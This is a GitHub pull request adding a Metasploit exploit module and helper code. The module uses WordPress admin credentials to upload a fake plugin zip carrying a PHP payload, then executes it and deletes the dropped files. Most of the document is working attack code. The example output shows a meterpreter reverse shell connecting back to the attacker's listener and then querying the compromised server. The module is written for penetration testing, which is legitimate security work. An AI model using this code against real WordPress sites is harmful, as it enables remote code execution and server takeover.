### PR TITLE
Add generic WordPress admin shell upload module

### DIFF
--- a/lib/msf/http/wordpress.rb
+++ b/lib/msf/http/wordpress.rb
@@ -4,6 +4,7 @@
 module Msf
   module HTTP
     module Wordpress
+      require 'msf/http/wordpress/admin'
       require 'msf/http/wordpress/base'
       require 'msf/http/wordpress/helpers'
       require 'msf/http/wordpress/login'
@@ -14,6 +15,7 @@ module Msf
       require 'msf/http/wordpress/xml_rpc'
 
       include Msf::Exploit::Remote::HttpClient
+      include Msf::HTTP::Wordpress::Admin
       include Msf::HTTP::Wordpress::Base
       include Msf::HTTP::Wordpress::Helpers
       include Msf::HTTP::Wordpress::Login

--- a/lib/msf/http/wordpress/admin.rb
+++ b/lib/msf/http/wordpress/admin.rb
@@ -1,0 +1,43 @@
+# -*- coding: binary -*-
+
+module Msf::HTTP::Wordpress::Admin
+  # Uploads a plugin using a valid admin session.
+  #
+  # @param name [String] The name of the plugin
+  # @param zip [String] The plugin zip file as a string
+  # @param cookie [String] A valid admin session cookie
+  # @return [Boolean] true on success, false on error
+  def wordpress_upload_plugin(name, zip, cookie)
+    nonce = wordpress_helper_get_plugin_upload_nonce(cookie)
+    if nonce.nil?
+      vprint_error("#{peer} - Failed to acquire the plugin upload nonce")
+      return false
+    end
+    vprint_status("#{peer} - Acquired a plugin upload nonce: #{nonce}")
+
+    referer_uri = normalize_uri(wordpress_url_backend, 'plugin-install.php?tab=upload')
+    data = Rex::MIME::Message.new
+    data.add_part(nonce, nil, nil, 'form-data; name="_wpnonce"')
+    data.add_part(referer_uri, nil, nil, 'form-data; name="_wp_http_referer"')
+    data.add_part(zip, 'application/octet-stream', 'binary', "form-data; name=\"pluginzip\"; filename=\"#{name}.zip\"")
+    data.add_part('Install Now', nil, nil, 'form-data; name="install-plugin-submit"')
+
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => wordpress_url_admin_update,
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => data.to_s,
+      'cookie'    => cookie,
+      'vars_get'  => { 'action' => 'upload-plugin' }
+    )
+
+    if res && res.code == 200
+      vprint_status("#{peer} - Uploaded plugin #{name}")
+      return true
+    else
+      vprint_error("#{peer} - Server responded with code #{res.code}") if res
+      vprint_error("#{peer} - Failed to upload plugin #{name}")
+      return false
+    end
+  end
+end

--- a/lib/msf/http/wordpress/helpers.rb
+++ b/lib/msf/http/wordpress/helpers.rb
@@ -132,6 +132,8 @@ module Msf::HTTP::Wordpress::Helpers
       'vars_get'  => { 'tab' => 'upload' }
     }
     res = send_request_cgi(options)
-    res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
+    if res && res.code == 200
+      return res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
+    end
   end
 end

--- a/lib/msf/http/wordpress/helpers.rb
+++ b/lib/msf/http/wordpress/helpers.rb
@@ -119,4 +119,19 @@ module Msf::HTTP::Wordpress::Helpers
     path_from_uri(location)
   end
 
+  # Helper method to retrieve a valid plugin upload nonce.
+  #
+  # @param cookie [String] A valid admin session cookie
+  # @return [String,nil] The nonce, nil on error
+  def wordpress_helper_get_plugin_upload_nonce(cookie)
+    uri = normalize_uri(wordpress_url_backend, 'plugin-install.php')
+    options = {
+      'method'    => 'GET',
+      'uri'       => uri,
+      'cookie'    => cookie,
+      'vars_get'  => { 'tab' => 'upload' }
+    }
+    res = send_request_cgi(options)
+    res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
+  end
 end

--- a/lib/msf/http/wordpress/uris.rb
+++ b/lib/msf/http/wordpress/uris.rb
@@ -87,6 +87,12 @@ module Msf::HTTP::Wordpress::URIs
     normalize_uri(wordpress_url_backend, 'admin-post.php')
   end
 
+  # Returns the Wordpress Admin Update URL
+  #
+  # @return [String] Wordpress Admin Update URL
+  def wordpress_url_admin_update
+    normalize_uri(wordpress_url_backend, 'update.php')
+  end  
 
   # Returns the Wordpress wp-content dir URL
   #

--- a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
+++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
@@ -48,16 +48,11 @@ class Metasploit3 < Msf::Exploit::Remote
     datastore['PASSWORD']
   end
 
-  def referer_uri
-    normalize_uri(wordpress_url_backend, 'plugin-install.php?tab=upload')
-  end
-
   def generate_plugin(plugin_name, payload_name)
-    r = Random.new
     plugin_script = %Q{<?php
 /**
  * Plugin Name: #{plugin_name}
- * Version: #{r.rand(1..20)}.#{r.rand(0..20)}.#{r.rand(0..20)}
+ * Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}
  * Author: #{Rex::Text.rand_text_alpha(10)}
  * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com
  * License: GPL2
@@ -66,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
     zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
-    zip.add_file("#{plugin_name}/#{payload_name}", payload.encoded)
+    zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded)
     zip
   end
 
@@ -80,8 +75,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status("#{peer} - Preparing payload...")
     plugin_name = Rex::Text.rand_text_alpha(10)
-    payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
-    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_name)
+    payload_name = "#{Rex::Text.rand_text_alpha(10)}"
+    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
     zip = generate_plugin(plugin_name, payload_name)
 
     print_status("#{peer} - Uploading payload...")
@@ -89,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
 
     print_status("#{peer} - Executing the payload at #{payload_uri}...")
-    register_files_for_cleanup(payload_name)
+    register_files_for_cleanup("#{payload_name}.php")
     register_files_for_cleanup("#{plugin_name}.php")
     send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
   end

--- a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
+++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
@@ -26,6 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           'Rob Carr <rob[at]rastating.com>' # Metasploit module
         ],
+      'DisclosureDate'  => 'Feb 21 2015',
       'Platform'        => 'php',
       'Arch'            => ARCH_PHP,
       'Targets'         => [['WordPress', {}]],
@@ -55,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
     r = Random.new
     plugin_script = %Q{<?php
 /**
- * Plugin Name: #{plugin_name} 
+ * Plugin Name: #{plugin_name}
  * Version: #{r.rand(1..20)}.#{r.rand(0..20)}.#{r.rand(0..20)}
  * Author: #{Rex::Text.rand_text_alpha(10)}
  * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com

--- a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
+++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
@@ -1,0 +1,95 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/zip'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress Admin Shell Upload',
+      'Description'     => %q{
+          This module will generate a plugin, pack the payload into it
+          and upload it to a server running WordPress providing valid
+          admin credentials are used.
+        },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Rob Carr <rob[at]rastating.com>' # Metasploit module
+        ],
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['WordPress', {}]],
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
+        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
+      ], self.class)
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def referer_uri
+    normalize_uri(wordpress_url_backend, 'plugin-install.php?tab=upload')
+  end
+
+  def generate_plugin(plugin_name, payload_name)
+    r = Random.new
+    plugin_script = %Q{<?php
+/**
+ * Plugin Name: #{plugin_name} 
+ * Version: #{r.rand(1..20)}.#{r.rand(0..20)}.#{r.rand(0..20)}
+ * Author: #{Rex::Text.rand_text_alpha(10)}
+ * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com
+ * License: GPL2
+ */
+?>}
+
+    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+    zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
+    zip.add_file("#{plugin_name}/#{payload_name}", payload.encoded)
+    zip
+  end
+
+  def exploit
+    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
+
+    print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...")
+    cookie = wordpress_login(username, password)
+    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
+    print_good("#{peer} - Authenticated with WordPress")
+
+    print_status("#{peer} - Preparing payload...")
+    plugin_name = Rex::Text.rand_text_alpha(10)
+    payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
+    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_name)
+    zip = generate_plugin(plugin_name, payload_name)
+
+    print_status("#{peer} - Uploading payload...")
+    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie)
+    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
+
+    print_status("#{peer} - Executing the payload at #{payload_uri}...")
+    register_files_for_cleanup(payload_name)
+    register_files_for_cleanup("#{plugin_name}.php")
+    send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
+  end
+end


### PR DESCRIPTION
As per discussions [Here](https://github.com/rapid7/metasploit-framework/pull/4789), I have created a generic shell upload module that can be used after successful privilege escalation in WordPress systems. This module works by creating a valid WordPress plugin and packing the payload into said plugin, which is subsequently uploaded and installed on to the WordPress server; allowing for the remote execution.
## Important Notes
- I have abstracted the nonce acquisition code into the `helpers.rb` file
- I have created a new WordPress module called `Msf::HTTP::Wordpress::Admin`, currently it only contains the `wordpress_upload_plugin` function, but I created it so other authenticated requests and functionality can be placed into this module in the future
- In the original discussion around this functionality, it was mentioned about adding a `delete_plugin` function, however, you will notice two files are registered for cleanup prior to the execution of the payload - the deletion of both of these files removes the plugin from the plugin listing in the WordPress admin panel and voids the need to delete them via generating a nonce and making the appropriate HTTP requests
- On lines 58-65, you'll notice I haven't tabbed the code in at all - this is because WordPress is expecting a single space at the start of each comment line, tabbing it in will prevent it validating the script as a valid plugin; it looks a little bit ugly but it's unfortunately a requirement :( I'm open to suggestions on making that look a bit prettier though if anyone has any ideas
## Verification
- [x] Download and install [WordPress](https://wordpress.org/download/)
- [x] Load msfconsole and `use exploit/unix/webapp/wp_admin_shell_upload`
- [x] Set `RHOST` to the target's address
- [x] If running WordPress in a subdirectory, ensure to set `TARGETURI` appropriately (e.g. if running in a folder called wordpress, set `TARGETURI` to `/wordpress/`)
- [x] Set `USERNAME` and `PASSWORD` to the credentials of the WordPress user you wish to authenticate as (must be a user that has admin rights)
- [x] Set the payload and its required options
- [x] Run the module
## Example Output

```
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(wp_admin_shell_upload) > set LHOST 192.168.1.189
LHOST => 192.168.1.189
msf exploit(wp_admin_shell_upload) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(wp_admin_shell_upload) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf exploit(wp_admin_shell_upload) > set USERNAME root
USERNAME => root
msf exploit(wp_admin_shell_upload) > set PASSWORD toor
PASSWORD => toor
msf exploit(wp_admin_shell_upload) > run

[*] Started reverse handler on 192.168.1.189:4444
[*] 192.168.1.15:80 - Authenticating with WordPress using root:toor...
[+] 192.168.1.15:80 - Authenticated with WordPress
[*] 192.168.1.15:80 - Preparing payload...
[*] 192.168.1.15:80 - Uploading payload...
[*] 192.168.1.15:80 - Executing the payload at /wordpress/wp-content/plugins/TlQVnerrlI/fnVNRGXTQp.php...
[*] Sending stage (40499 bytes) to 192.168.1.15
[*] Meterpreter session 1 opened (192.168.1.189:4444 -> 192.168.1.15:42327) at 2015-02-21 01:42:31 +0000
[+] Deleted fnVNRGXTQp.php
[+] Deleted TlQVnerrlI.php

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64
Meterpreter : php/php
meterpreter > getuid
Server username: www-data (33)
meterpreter >
```
